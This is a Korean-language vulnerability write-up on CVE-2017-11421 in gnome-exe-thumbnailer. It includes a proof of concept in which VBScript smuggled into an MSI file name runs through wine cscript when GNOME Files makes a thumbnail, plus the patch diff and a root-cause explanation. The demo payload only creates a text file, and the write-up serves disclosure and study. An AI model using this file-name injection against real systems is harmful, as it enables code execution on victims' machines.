CVE-2017-11421

gnome-exe-thumbnailer에서 임의의 VBscript 삽입이 가능한 취약점 Bad Taste(CVE-2017-11421)가 발생했다.

POC

• 취약점 테스트를 위해 poc.xml을 생성한다.

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>

• wixl로 poc.msi를 생성한다.

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

wixl : XML 문서로 MSI 패키지를 빌드하는 도구

• 그놈 파일 매니저(GNOME Files)를 이용하여 poc.msi가 저장된 디렉터리를 탐색하면 badtaste.txt파일이 생성되는 것을 확인할 수 있다.

Diff

Github에서 소스코드 변경 이력을 확인해보면 삭제된 코드 중에 wine으로 cscript.exe를 활용하는 부분을 확인할 수 있다.

# Get the version number:
  if [[ ${INPUTFILE##*.} = 'msi' ]]
  then
 -  # Look for the ProductVersion property if user has the Microsoft (R) Windows Script Host installed:
 -  if which wine && grep -v 'Wine placeholder DLL' $HOME/.wine/drive_c/windows/system32/cscript.exe
 +  # Look for the ProductVersion property using msitools' msiinfo if present
 +  if which msiinfo
    then
 -      # Workaround wine bug #19799: cscript crashes if you call WScript.Arguments(0)
 -      # http://bugs.winehq.org/show_bug.cgi?id=19799
 -      <<< "
 -          Dim WI, DB, View, Record
 -          Set WI = CreateObject(\"WindowsInstaller.Installer\")
 -          Set DB = WI.OpenDatabase(\"$INPUTFILE\",0)
 -          Set View = DB.OpenView(\"SELECT Value FROM Property WHERE Property = 'ProductVersion'\")
 -          View.Execute
 -          Wscript.Echo View.Fetch.StringData(1)
 -      " iconv -f utf8 -t unicode > $TEMPFILE1.vbs
 -
 -      VERSION=$(
 -          DISPLAY=NONE wine cscript.exe //E:vbs //NoLogo Z:\\tmp\\${TEMPFILE1##*/}.vbs 2>/dev/null \
 -          | egrep -o '^[0-9]+\.[0-9]+(\.[0-9][0-9]?)?(beta)?'
 -      )
 -
 +      VERSION=$(msiinfo export "$INPUTFILE" 'Property' | grep 'ProductVersion' | cut -f 2)
    else
        # Try to get the version number from extended file properties at least:
        VERSION=$(

cscript는 커맨드환경에서 스크립트를 실행할 수 있게 해주는 도구이다.

CScript [호스트옵션…] [스크립트 이름] [스크립트 옵션과 매개변수]
옵션:
//B 배치 모드: 스크립트 오류와 프롬프트를 표시하지 않습니다.
//D 디버깅을 사용 가능하게 합니다.
//E:engine 스크립트 실행에 엔진을 사용합니다.
//H:CScript 기본 스크립트 호스트를 CScript.exe로 변경합니다.
//H:WScript 기본 스크립트 호스트를 WScript.exe(기본값)로 변경합니다.
//I 상호 작용 모드(기본값, //B와 반대 경우)
//Job:xxxx WSF 작업을 수행합니다.
//Logo 로고(기본값)를 표시합니다.
//Nologo 로고를 표시하지 않습니다. 즉, 실행 시에 배너가 표시되지 않습니다.
//S 현재 명령줄 옵션을 지금 사용자에 대하여 저장합니다.
//T:nn 다음 시간 내에 타임 아웃: 스크립트 실행에 허용된 최대 시간입니다.
//X 디버거에서 스크립트 실행합니다.
//U 콘솔에서 리디렉션 I/O로 유니코드를 사용합니다.

파일에 썸네일을 표시하기 위해서 접근한 gnome-exe-thumbnailer는 파일 명에 대한 검증 없이 명령어를 수행하여 파일 명에 삽입 된 vbscript구문을 그대로 실행하게 된다.

VERSION=$(
 -          DISPLAY=NONE wine cscript.exe //E:vbs //NoLogo Z:\\tmp\\poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi.vbs 2>/dev/null \
 -          | egrep -o '^[0-9]+\.[0-9]+(\.[0-9][0-9]?)?(beta)?'
 -      )

Summary
bugs.debian.org
Github